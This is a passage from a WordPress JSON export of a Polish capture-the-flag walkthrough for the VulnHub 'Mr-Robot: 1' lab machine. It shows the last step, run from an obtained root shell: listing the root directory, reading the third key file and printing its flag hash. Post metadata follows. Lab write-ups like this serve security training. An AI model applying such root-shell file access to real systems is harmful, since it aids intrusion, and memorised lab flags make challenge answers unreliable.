-l<br>ls -l<br>total 4<br>-rw-r \u2014 r \u2014 1 root root 0 Nov 13 2015 firstboot_done<br>-r \u2014 \u2014 \u2014 \u2014 1 root root 33 Nov 13 2015 key-3-of-3.txt<br>#<\/p><\/blockquote>\n\n\n\n<p>czytamy plik key-3-of-3.txt:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p># cat key-3-of-3.txt<br>cat key-3-of-3.txt<br>04787ddef27c3dee1ee161b21670b4e4<\/p><\/blockquote>\n\n\n\n<p>i tym oto sposobem rozwi\u0105zali\u015bmy virtualk\u0119 z <a href=\"https:\/\/www.vulnhub.com\/entry\/mr-robot-1,151\/\">VulnHub (Mr-Robot: 1)<\/a><\/p>\n\n\n\n<p>Polecam ka\u017cdemu spr\u00f3bowa\u0107 samemu rozwi\u0105za\u0107 t\u0105 virtualk\u0119 \ud83d\ude42 .<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dzisiaj zaprezentuj\u0119 wam jak uzyska\u0107 wszystkie 3 klucze z obrazu Mr-Robot: 1 dost\u0119pnego tutaj: https:\/\/www.vulnhub.com\/entry\/mr-robot-1,151\/ , a wi\u0119c do dzie\u0142a \ud83d\ude42<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-35","post","type-post","status-publish","format-standard","hentry","category-bezpieczenstwo-internetowe"],"_links":{"self":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/35","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=35"}],"version-history":[{"count":3,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/35\/revisions"}],"predecessor-version":[{"id":527,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=\/wp\/v2\/posts\/35\/revisions\/527"}],"wp:attachment":[{"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=35"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=35"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.linuxsystems.ovh\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=35"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}